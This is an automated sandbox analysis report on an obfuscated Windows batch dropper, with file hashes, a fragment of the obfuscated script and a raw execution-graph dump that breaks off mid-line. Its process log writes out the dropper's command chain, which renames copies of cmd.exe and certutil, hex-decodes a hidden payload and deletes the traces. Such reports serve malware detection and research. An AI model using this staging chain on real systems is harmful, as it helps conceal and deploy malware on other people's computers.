                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

                                          \Device\Null

                                          Download File
                                          Process:C:\Users\Public\alpha.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):104
                                          Entropy (8bit):4.403504238247217
                                          Encrypted:false
                                          SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                                          MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                                          SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                                          SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                                          SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                                          Malicious:false
                                          Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...

                                          Static File Info

                                          General

                                          File type:ISO-8859 text, with very long lines (984), with CRLF line terminators
                                          Entropy (8bit):5.168549713905825
                                          TrID:
                                            File name:Xirnkxhvuzwepe.cmd
                                            File size:3'228'698 bytes
                                            MD5:41152edeb64fe66b4bbd10372223d23a
                                            SHA1:bc226681860e303393e335ce81aecb6d13d13d5b
                                            SHA256:cec24e6d4ef5928960be72f7794ee5cbe7ab4df57bd080116434724dc2ff7ebc
                                            SHA512:35d1189762e90bc9e41796bae629c76338e19f7e35c6249bbba5da2a291cbb0d39570d477aba3aba4740cd79503399dfdde2150c3d944cf777140fba0d5fd1a4
                                            SSDEEP:24576:tQa2jlXsFQaZgwQoq6JuxJ1ZQyl2Gb9+rFcHiY02St0pTKhCC7zCD8PWBZwmnO0D:tQa2J8FQQgt60xaYD8f6/ash
                                            TLSH:8AE552F339BD06D62B0F36EB579FE62D8A17CC2D56833DC00BC3358D1819A6AE454899
                                            File Content Preview:COMCOM..&@cls&@set "_..=pynZVg7@tkEwvS38eBNKG4PD bxT6cLX0zsOiCfmH2jF59uMaoAq1UJhlRYrdQIW"..%_..:~7,1%%.......%%_..:~34,1%%_..:~16,1%%_..:~8,1%%_..:~24,1%"_...=%_..:~20,1%%_..:~10,1%%_..:~19,1%%_..:~54,1%%_..:~61,1%%_..:~13,1%%_..:~12,1%%.......%%_..:~22,1

                                            File Icon

                                            Icon Hash:9686878b929a9886

                                            Network Behavior

                                            No network behavior found

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:07:28:50
                                            Start date:27/07/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "
                                            Imagebase:0x7ff6a3ad0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:1
                                            Start time:07:28:50
                                            Start date:27/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:07:28:51
                                            Start date:27/07/2024
                                            Path:C:\Windows\System32\extrac32.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                            Imagebase:0x7ff665730000
                                            File size:35'328 bytes
                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:07:28:51
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\alpha.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                            Imagebase:0x7ff6eb170000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            • Detection: 0%, Virustotal, Browse
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:07:28:51
                                            Start date:27/07/2024
                                            Path:C:\Windows\System32\extrac32.exe
                                            Wow64 process (32bit):false
                                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                            Imagebase:0x7ff665730000
                                            File size:35'328 bytes
                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:07:28:51
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\alpha.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
                                            Imagebase:0x7ff6eb170000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:07:28:51
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\kn.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
                                            Imagebase:0x7ff7fd790000
                                            File size:1'651'712 bytes
                                            MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            • Detection: 0%, Virustotal, Browse
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:07:28:52
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\alpha.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10
                                            Imagebase:0x7ff6eb170000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:07:28:52
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\kn.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10
                                            Imagebase:0x7ff7fd790000
                                            File size:1'651'712 bytes
                                            MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:07:28:52
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\alpha.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                            Imagebase:0x7ff6eb170000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:07:28:52
                                            Start date:27/07/2024
                                            Path:C:\Users\Public\alpha.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
                                            Imagebase:0x7ff6eb170000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:5.4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:36.9%
                                              Total number of Nodes:664
                                              Total number of Limit Nodes:27
                                              execution_graph 16825 7ff6eb18415d 16826 7ff6eb18412e 16825->16826 16829 7ff6eb188f80 16826->16829 16832 7ff6eb188f89 16829->16832 16830 7ff6eb188fe0 RtlCaptureContext RtlLookupFunctionEntry 16833 7ff6eb189025 RtlVirtualUnwind 16830->16833 16834 7ff6eb189067 16830->16834 16831 7ff6eb18413e 16832->16830 16832->16831 16833->16834 16837 7ff6eb188fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16834->16837 16772 7ff6eb188d80 16773 7ff6eb188da4 16772->16773 16774 7ff6eb188db6 16773->16774 16775 7ff6eb188dbf Sleep 16773->16775 16776 7ff6eb188ddb _amsg_exit 16774->16776 16777 7ff6eb188de7 16774->16777 16775->16773 16776->16777 16778 7ff6eb188e56 _initterm 16777->16778 16779 7ff6eb188e73 _IsNonwritableInCurrentImage 16777->16779 16780 7ff6eb188e3c 16777->16780 16778->16779 16786 7ff6eb1837d8 GetCurrentThreadId OpenThread 16779->16786 16819 7ff6eb1804f4 16786->16819 16788 7ff6eb183839 HeapSetInformation RegOpenKeyExW 16789 7ff6eb18388d 16788->16789 16790 7ff6eb18e9f8 RegQueryValueExW RegCloseKey 16788->16790 16791 7ff6eb185920 VirtualQuery VirtualQuery 16789->16791 16793 7ff6eb18ea41 GetThreadLocale 16790->16793 16792 7ff6eb1838ab GetConsoleOutputCP GetCPInfo 16791->16792 16792->16793 16794 7ff6eb1838f1 memset 16792->16794 16810 7ff6eb183919 16793->16810 16794->16810 16795 7ff6eb184d5c 391 API calls 16795->16810 16796 7ff6eb183948 _setjmp 16796->16810 16797 7ff6eb18eb27 _setjmp 16797->16810 16798 7ff6eb173240 166 API calls 16798->16810 16799 7ff6eb198530 370 API calls 16799->16810 16800 7ff6eb1801b8 6 API calls 16800->16810 16801 7ff6eb184c1c 166 API calls 16801->16810 16802 7ff6eb18eb71 _setmode 16802->16810 16803 7ff6eb17df60 481 API calls 16803->16810 16804 7ff6eb1886f0 182 API calls 16804->16810 16805 7ff6eb180580 12 API calls 16806 7ff6eb18398b GetConsoleOutputCP GetCPInfo 16805->16806 16808 7ff6eb1804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16806->16808 16807 7ff6eb1858e4 EnterCriticalSection LeaveCriticalSection 16807->16810 16808->16810 16809 7ff6eb17be00 647 API calls 16809->16810 16810->16790 16810->16795 16810->16796 16810->16797 16810->16798 16810->16799 16810->16800 16810->16801 16810->16802 16810->16803 16810->16804 16810->16805 16810->16807 16810->16809 16811 7ff6eb1858e4 EnterCriticalSection LeaveCriticalSection 16810->16811 16812 7ff6eb18ebbe GetConsoleOutputCP GetCPInfo 16811->16812 16813 7ff6eb1804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16812->16813 16814 7ff6eb18ebe6 16813->16814 16815 7ff6eb17be00 647 API calls 16814->16815 16816 7ff6eb180580 12 API calls 16814->16816 16815->16814 16817 7ff6eb18ebfc GetConsoleOutputCP GetCPInfo 16816->16817 16818 7ff6eb1804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16817->16818 16818->16810 16820 7ff6eb180504 16819->16820 16821 7ff6eb18051e GetModuleHandleW 16820->16821 16822 7ff6eb18054d GetProcAddress 16820->16822 16823 7ff6eb18056c SetThreadLocale 16820->16823 16821->16820 16822->16820 20722 7ff6eb176be0 20723 7ff6eb17cd90 166 API calls 20722->20723 20724 7ff6eb176c04 20723->20724 20725 7ff6eb1941a2 20724->20725 20726 7ff6eb176c13 _pipe 20724->20726 20728 7ff6eb173278 166 API calls 20725->20728 20729 7ff6eb176c32 20726->20729 20759 7ff6eb176e26 20726->20759 20727 7ff6eb173278 166 API calls 20727->20725 20730 7ff6eb1941bc 20728->20730 20734 7ff6eb176df1 20729->20734 20773 7ff6eb17affc _dup 20729->20773 20731 7ff6eb19e91c 198 API calls 20730->20731 20732 7ff6eb1941c1 20731->20732 20736 7ff6eb173278 166 API calls 20732->20736 20735 7ff6eb176c7d 20735->20725 20739 7ff6eb17b038 _dup2 20735->20739 20737 7ff6eb1941d2 20736->20737 20738 7ff6eb19e91c 198 API calls 20737->20738 20740 7ff6eb1941d7 20738->20740 20741 7ff6eb176c93 20739->20741 20742 7ff6eb173278 166 API calls 20740->20742 20741->20740 20743 7ff6eb17d208 _close 20741->20743 20744 7ff6eb1941e4 20742->20744 20745 7ff6eb176ca4 20743->20745 20746 7ff6eb19e91c 198 API calls 20744->20746 20775 7ff6eb17be00 20745->20775 20747 7ff6eb1941e9 20746->20747 20750 7ff6eb176d07 20752 7ff6eb17b038 _dup2 20750->20752 20751 7ff6eb176ccf _get_osfhandle DuplicateHandle 20751->20750 20753 7ff6eb176d11 20752->20753 20753->20740 20754 7ff6eb17d208 _close 20753->20754 20755 7ff6eb176d22 20754->20755 20756 7ff6eb176e21 20755->20756 20758 7ff6eb17affc _dup 20755->20758 20757 7ff6eb19e91c 198 API calls 20756->20757 20757->20759 20760 7ff6eb176d57 20758->20760 20759->20727 20760->20732 20761 7ff6eb17b038 _dup2 20760->20761 20762 7ff6eb176d6c 20761->20762 20762->20740 20763 7ff6eb17d208 _close 20762->20763 20764 7ff6eb176d7c 20763->20764 20765 7ff6eb17be00 647 API calls 20764->20765 20766 7ff6eb176d9c 20765->20766 20767 7ff6eb17b038 _dup2 20766->20767 20768 7ff6eb176da8 20767->20768 20768->20740 20769 7ff6eb17d208 _close 20768->20769 20770 7ff6eb176db9 20769->20770 20770->20756 20771 7ff6eb176dc1 20770->20771 20771->20734 20809 7ff6eb176e60 20771->20809 20774 7ff6eb17b018 20773->20774 20774->20735 20776 7ff6eb17be1b 20775->20776 20787 7ff6eb176cc4 20775->20787 20777 7ff6eb17be67 20776->20777 20778 7ff6eb17be47 memset 20776->20778 20776->20787 20780 7ff6eb17be73 20777->20780 20782 7ff6eb17bf29 20777->20782 20788 7ff6eb17beaf 20777->20788 20886 7ff6eb17bff0 20778->20886 20781 7ff6eb17be92 20780->20781 20785 7ff6eb17bf0c 20780->20785 20794 7ff6eb17bea1 20781->20794 20813 7ff6eb17c620 GetConsoleTitleW 20781->20813 20783 7ff6eb17cd90 166 API calls 20782->20783 20784 7ff6eb17bf33 20783->20784 20784->20788 20791 7ff6eb17bf70 20784->20791 20793 7ff6eb1788a8 _wcsicmp 20784->20793 20924 7ff6eb17b0d8 memset 20785->20924 20787->20750 20787->20751 20788->20787 20790 7ff6eb17bff0 185 API calls 20788->20790 20790->20787 20803 7ff6eb17bf75 20791->20803 20984 7ff6eb1771ec 20791->20984 20798 7ff6eb17bf5a 20793->20798 20794->20788 20799 7ff6eb17af98 2 API calls 20794->20799 20795 7ff6eb17bf1e 20795->20788 20797 7ff6eb17bfa9 20797->20788 20800 7ff6eb17cd90 166 API calls 20797->20800 20798->20791 20801 7ff6eb180a6c 273 API calls 20798->20801 20799->20788 20802 7ff6eb17bfbb 20800->20802 20801->20791 20802->20788 20804 7ff6eb18081c 166 API calls 20802->20804 20805 7ff6eb17b0d8 194 API calls 20803->20805 20804->20803 20806 7ff6eb17bf7f 20805->20806 20806->20788 20857 7ff6eb185ad8 20806->20857 20812 7ff6eb176e6d 20809->20812 20810 7ff6eb176eb9 20810->20734 20811 7ff6eb185cb4 7 API calls 20811->20812 20812->20810 20812->20811 20815 7ff6eb17c675 20813->20815 20820 7ff6eb17ca2f 20813->20820 20814 7ff6eb18c5fc GetLastError 20814->20820 20816 7ff6eb17ca40 17 API calls 20815->20816 20826 7ff6eb17c69b 20816->20826 20817 7ff6eb173278 166 API calls 20817->20820 20818 7ff6eb18855c ??_V@YAXPEAX 20818->20820 20819 7ff6eb18291c 8 API calls 20843 7ff6eb17c762 20819->20843 20820->20814 20820->20817 20820->20818 20821 7ff6eb17c9b5 20825 7ff6eb18855c ??_V@YAXPEAX 20821->20825 20822 7ff6eb1789c0 23 API calls 20849 7ff6eb17c964 20822->20849 20823 7ff6eb17c978 towupper 20823->20849 20824 7ff6eb18855c ??_V@YAXPEAX 20824->20843 20844 7ff6eb17c855 20825->20844 20826->20820 20826->20821 20827 7ff6eb17d3f0 223 API calls 20826->20827 20826->20843 20830 7ff6eb17c741 20827->20830 20828 7ff6eb17c872 20831 7ff6eb18855c ??_V@YAXPEAX 20828->20831 20829 7ff6eb19ec14 173 API calls 20829->20843 20833 7ff6eb17c74d 20830->20833 20835 7ff6eb17c8b5 wcsncmp 20830->20835 20834 7ff6eb17c87c 20831->20834 20832 7ff6eb18c6b8 SetConsoleTitleW 20832->20828 20836 7ff6eb17bd38 207 API calls 20833->20836 20833->20843 20837 7ff6eb188f80 7 API calls 20834->20837 20835->20833 20835->20843 20836->20843 20839 7ff6eb17c88e 20837->20839 20838 7ff6eb17c83d 20990 7ff6eb17cb40 20838->20990 20839->20794 20841 7ff6eb17c78a wcschr 20841->20843 20843->20819 20843->20820 20843->20824 20843->20838 20843->20841 20845 7ff6eb17ca25 20843->20845 20847 7ff6eb18c684 20843->20847 20843->20849 20851 7ff6eb17ca2a 20843->20851 20844->20828 20844->20832 20848 7ff6eb173278 166 API calls 20845->20848 20850 7ff6eb173278 166 API calls 20847->20850 20848->20820 20849->20814 20849->20821 20849->20822 20849->20823 20849->20829 20849->20843 20853 7ff6eb17ca16 GetLastError 20849->20853 20850->20820 20852 7ff6eb189158 7 API calls 20851->20852 20852->20820 20855 7ff6eb173278 166 API calls 20853->20855 20856 7ff6eb18c675 20855->20856 20856->20820 20858 7ff6eb17cd90 166 API calls 20857->20858 20859 7ff6eb185b12 20858->20859 20860 7ff6eb17cb40 166 API calls 20859->20860 20885 7ff6eb185b8b 20859->20885 20862 7ff6eb185b26 20860->20862 20861 7ff6eb188f80 7 API calls 20863 7ff6eb17bf99 20861->20863 20864 7ff6eb180a6c 273 API calls 20862->20864 20862->20885 20863->20794 20865 7ff6eb185b43 20864->20865 20866 7ff6eb185bb8 20865->20866 20867 7ff6eb185b48 GetConsoleTitleW 20865->20867 20868 7ff6eb185bbd GetConsoleTitleW 20866->20868 20869 7ff6eb185bf4 20866->20869 20870 7ff6eb17cad4 172 API calls 20867->20870 20871 7ff6eb17cad4 172 API calls 20868->20871 20872 7ff6eb18f452 20869->20872 20876 7ff6eb185bfd 20869->20876 20873 7ff6eb185b66 20870->20873 20875 7ff6eb185bdb 20871->20875 20874 7ff6eb183c24 166 API calls 20872->20874 21006 7ff6eb184224 InitializeProcThreadAttributeList 20873->21006 20874->20885 21066 7ff6eb1796e8 20875->21066 20878 7ff6eb185c1b 20876->20878 20879 7ff6eb18f462 20876->20879 20876->20885 20882 7ff6eb173278 166 API calls 20878->20882 20883 7ff6eb173278 166 API calls 20879->20883 20880 7ff6eb185b7f 20884 7ff6eb185c3c SetConsoleTitleW 20880->20884 20882->20885 20883->20885 20884->20885 20885->20861 20887 7ff6eb17c01c 20886->20887 20890 7ff6eb17c0c4 20886->20890 20888 7ff6eb17c086 20887->20888 20889 7ff6eb17c022 20887->20889 20894 7ff6eb17c144 20888->20894 20905 7ff6eb17c094 20888->20905 20891 7ff6eb17c113 20889->20891 20892 7ff6eb17c030 20889->20892 20890->20777 20903 7ff6eb17ff70 2 API calls 20891->20903 20907 7ff6eb17c053 20891->20907 20893 7ff6eb17c039 wcschr 20892->20893 20892->20907 20896 7ff6eb17c301 20893->20896 20893->20907 20895 7ff6eb17c151 20894->20895 20916 7ff6eb17c1c8 20894->20916 21272 7ff6eb17c460 20895->21272 20902 7ff6eb17cd90 166 API calls 20896->20902 20897 7ff6eb17c058 20908 7ff6eb17ff70 2 API calls 20897->20908 20911 7ff6eb17c073 20897->20911 20898 7ff6eb17c0c6 20901 7ff6eb17c0cf wcschr 20898->20901 20898->20911 20900 7ff6eb17c460 183 API calls 20900->20905 20906 7ff6eb17c1be 20901->20906 20901->20911 20923 7ff6eb17c30b 20902->20923 20903->20907 20905->20890 20905->20900 20909 7ff6eb17cd90 166 API calls 20906->20909 20907->20897 20907->20898 20913 7ff6eb17c211 20907->20913 20908->20911 20909->20916 20910 7ff6eb17c460 183 API calls 20910->20890 20911->20890 20912 7ff6eb17c460 183 API calls 20911->20912 20912->20911 20918 7ff6eb17ff70 2 API calls 20913->20918 20914 7ff6eb17c285 20914->20913 20919 7ff6eb17b6b0 170 API calls 20914->20919 20915 7ff6eb17b6b0 170 API calls 20915->20907 20916->20890 20916->20913 20916->20914 20920 7ff6eb17d840 178 API calls 20916->20920 20917 7ff6eb17d840 178 API calls 20917->20923 20918->20890 20921 7ff6eb17c2ac 20919->20921 20920->20916 20921->20911 20921->20913 20922 7ff6eb17c3d4 20922->20911 20922->20913 20922->20915 20923->20890 20923->20913 20923->20917 20923->20922 20925 7ff6eb17ca40 17 API calls 20924->20925 20941 7ff6eb17b162 20925->20941 20926 7ff6eb17b2e1 20928 7ff6eb17b2f7 ??_V@YAXPEAX 20926->20928 20929 7ff6eb17b303 20926->20929 20927 7ff6eb17b1d9 20932 7ff6eb17cd90 166 API calls 20927->20932 20947 7ff6eb17b1ed 20927->20947 20928->20929 20931 7ff6eb188f80 7 API calls 20929->20931 20930 7ff6eb181ea0 8 API calls 20930->20941 20933 7ff6eb17b315 20931->20933 20932->20947 20933->20781 20933->20795 20935 7ff6eb17b228 _get_osfhandle 20937 7ff6eb17b23f _get_osfhandle 20935->20937 20935->20947 20936 7ff6eb18bfef _get_osfhandle SetFilePointer 20938 7ff6eb18c01d 20936->20938 20936->20947 20937->20947 20940 7ff6eb1833f0 _vsnwprintf 20938->20940 20939 7ff6eb17affc _dup 20939->20947 20943 7ff6eb18c038 20940->20943 20941->20926 20941->20927 20941->20930 20941->20941 20942 7ff6eb1801b8 6 API calls 20942->20947 20948 7ff6eb173278 166 API calls 20943->20948 20944 7ff6eb18c1c3 20945 7ff6eb1833f0 _vsnwprintf 20944->20945 20945->20943 20946 7ff6eb17d208 _close 20946->20947 20947->20926 20947->20935 20947->20936 20947->20939 20947->20942 20947->20944 20947->20946 20949 7ff6eb18c060 20947->20949 20951 7ff6eb17b038 _dup2 20947->20951 20952 7ff6eb18c246 20947->20952 20955 7ff6eb1826e0 19 API calls 20947->20955 20958 7ff6eb17b356 20947->20958 20983 7ff6eb18c1a5 20947->20983 21286 7ff6eb19f318 _get_osfhandle GetFileType 20947->21286 20950 7ff6eb18c1f9 20948->20950 20949->20952 20956 7ff6eb1809f4 2 API calls 20949->20956 20953 7ff6eb17af98 2 API calls 20950->20953 20951->20947 20957 7ff6eb17af98 2 API calls 20952->20957 20953->20926 20954 7ff6eb17b038 _dup2 20959 7ff6eb18c1b7 20954->20959 20955->20947 20960 7ff6eb18c084 20956->20960 20961 7ff6eb18c24b 20957->20961 20967 7ff6eb17af98 2 API calls 20958->20967 20962 7ff6eb18c1be 20959->20962 20963 7ff6eb18c207 20959->20963 20964 7ff6eb17b900 166 API calls 20960->20964 20965 7ff6eb19f1d8 166 API calls 20961->20965 20968 7ff6eb17d208 _close 20962->20968 20966 7ff6eb17d208 _close 20963->20966 20969 7ff6eb18c08c 20964->20969 20965->20926 20966->20958 20970 7ff6eb18c211 20967->20970 20968->20944 20971 7ff6eb18c094 wcsrchr 20969->20971 20979 7ff6eb18c0ad 20969->20979 20972 7ff6eb1833f0 _vsnwprintf 20970->20972 20971->20979 20973 7ff6eb18c22c 20972->20973 20974 7ff6eb173278 166 API calls 20973->20974 20974->20926 20975 7ff6eb18c0e0 _wcsnicmp 20975->20979 20976 7ff6eb17ff70 2 API calls 20977 7ff6eb18c13b 20976->20977 20977->20952 20980 7ff6eb18c146 SearchPathW 20977->20980 20978 7ff6eb18c106 20978->20976 20979->20975 20979->20978 20979->20979 20980->20952 20981 7ff6eb18c188 20980->20981 20982 7ff6eb1826e0 19 API calls 20981->20982 20982->20983 20983->20954 20985 7ff6eb177279 20984->20985 20986 7ff6eb177211 _setjmp 20984->20986 20985->20797 20986->20985 20988 7ff6eb177265 20986->20988 21287 7ff6eb1772b0 20988->21287 20991 7ff6eb17cb63 20990->20991 20992 7ff6eb17cd90 166 API calls 20991->20992 20993 7ff6eb17c848 20992->20993 20993->20844 20994 7ff6eb17cad4 20993->20994 20995 7ff6eb17cad9 20994->20995 21003 7ff6eb17cb05 20994->21003 20996 7ff6eb17cd90 166 API calls 20995->20996 20995->21003 20997 7ff6eb18c722 20996->20997 20998 7ff6eb18c72e GetConsoleTitleW 20997->20998 20997->21003 20999 7ff6eb18c74a 20998->20999 20998->21003 21000 7ff6eb17b6b0 170 API calls 20999->21000 21005 7ff6eb18c778 21000->21005 21001 7ff6eb18c7ec 21002 7ff6eb17ff70 2 API calls 21001->21002 21002->21003 21003->20844 21004 7ff6eb18c7dd SetConsoleTitleW 21004->21001 21005->21001 21005->21004 21007 7ff6eb1842ab UpdateProcThreadAttribute 21006->21007 21008 7ff6eb18ecd4 GetLastError 21006->21008 21009 7ff6eb18ecf0 GetLastError 21007->21009 21010 7ff6eb1842eb memset memset GetStartupInfoW 21007->21010 21011 7ff6eb18ecee 21008->21011 21103 7ff6eb199eec 21009->21103 21013 7ff6eb183a90 170 API calls 21010->21013 21015 7ff6eb1843a8 21013->21015 21016 7ff6eb17b900 166 API calls 21015->21016 21017 7ff6eb1843bb 21016->21017 21018 7ff6eb184638 _local_unwind 21017->21018 21019 7ff6eb1843cc 21017->21019 21018->21019 21020 7ff6eb184415 21019->21020 21021 7ff6eb1843de wcsrchr 21019->21021 21090 7ff6eb185a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 21020->21090 21021->21020 21022 7ff6eb1843f7 lstrcmpW 21021->21022 21022->21020 21024 7ff6eb184668 21022->21024 21091 7ff6eb199044 21024->21091 21025 7ff6eb18441a 21027 7ff6eb18442a CreateProcessW 21025->21027 21029 7ff6eb184596 CreateProcessAsUserW 21025->21029 21028 7ff6eb18448b 21027->21028 21030 7ff6eb184495 CloseHandle 21028->21030 21031 7ff6eb184672 GetLastError 21028->21031 21029->21028 21032 7ff6eb18498c 8 API calls 21030->21032 21045 7ff6eb18468d 21031->21045 21033 7ff6eb1844c5 21032->21033 21037 7ff6eb1844cd 21033->21037 21033->21045 21034 7ff6eb1847a3 21034->20880 21035 7ff6eb1844f8 21035->21034 21036 7ff6eb184612 21035->21036 21040 7ff6eb185cb4 7 API calls 21035->21040 21041 7ff6eb18461c 21036->21041 21043 7ff6eb1847e1 CloseHandle 21036->21043 21037->21034 21037->21035 21055 7ff6eb19a250 33 API calls 21037->21055 21038 7ff6eb17cd90 166 API calls 21039 7ff6eb184724 21038->21039 21042 7ff6eb18472c _local_unwind 21039->21042 21050 7ff6eb18473d 21039->21050 21044 7ff6eb184517 21040->21044 21046 7ff6eb17ff70 GetProcessHeap RtlFreeHeap 21041->21046 21042->21050 21043->21041 21047 7ff6eb1833f0 _vsnwprintf 21044->21047 21045->21037 21045->21038 21048 7ff6eb1847fa DeleteProcThreadAttributeList 21046->21048 21049 7ff6eb184544 21047->21049 21051 7ff6eb188f80 7 API calls 21048->21051 21052 7ff6eb18498c 8 API calls 21049->21052 21056 7ff6eb17ff70 GetProcessHeap RtlFreeHeap 21050->21056 21053 7ff6eb184820 21051->21053 21054 7ff6eb184558 21052->21054 21053->20880 21057 7ff6eb184564 21054->21057 21058 7ff6eb1847ae 21054->21058 21055->21035 21060 7ff6eb18475b _local_unwind 21056->21060 21061 7ff6eb18498c 8 API calls 21057->21061 21059 7ff6eb1833f0 _vsnwprintf 21058->21059 21059->21036 21060->21037 21062 7ff6eb184577 21061->21062 21062->21041 21063 7ff6eb18457f 21062->21063 21064 7ff6eb19a920 210 API calls 21063->21064 21065 7ff6eb184584 21064->21065 21065->21041 21078 7ff6eb179737 21066->21078 21068 7ff6eb17977d memset 21070 7ff6eb17ca40 17 API calls 21068->21070 21069 7ff6eb17cd90 166 API calls 21069->21078 21070->21078 21071 7ff6eb18b76e 21074 7ff6eb173278 166 API calls 21071->21074 21072 7ff6eb18b7b3 21073 7ff6eb18b79a 21076 